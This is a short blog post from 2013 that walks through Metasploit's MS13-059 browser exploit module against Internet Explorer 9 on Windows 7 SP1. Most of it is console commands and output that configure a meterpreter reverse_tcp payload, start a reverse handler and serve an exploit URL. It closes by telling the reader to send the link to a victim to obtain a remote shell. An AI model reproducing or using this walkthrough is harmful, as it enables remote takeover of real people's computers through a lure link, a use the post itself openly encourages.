Sunday, September 1, 2013

Exploit for IE 9 on Windows 7 SP1

This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version  9.0.8112.16446

Target
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)

msf > use exploit/windows/browser/ms13_059_cflatmarkuppointer

msf exploit(ms13_059_cflatmarkuppointer) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set uripath /
uripath => /
msf exploit(ms13_059_cflatmarkuppointer) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_059_cflatmarkuppointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_059_cflatmarkuppointer) > [*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Now send that link to victim; as soon as he open link; you will get meterpreter shell.
ie9-exploit

No comments:

Post a Comment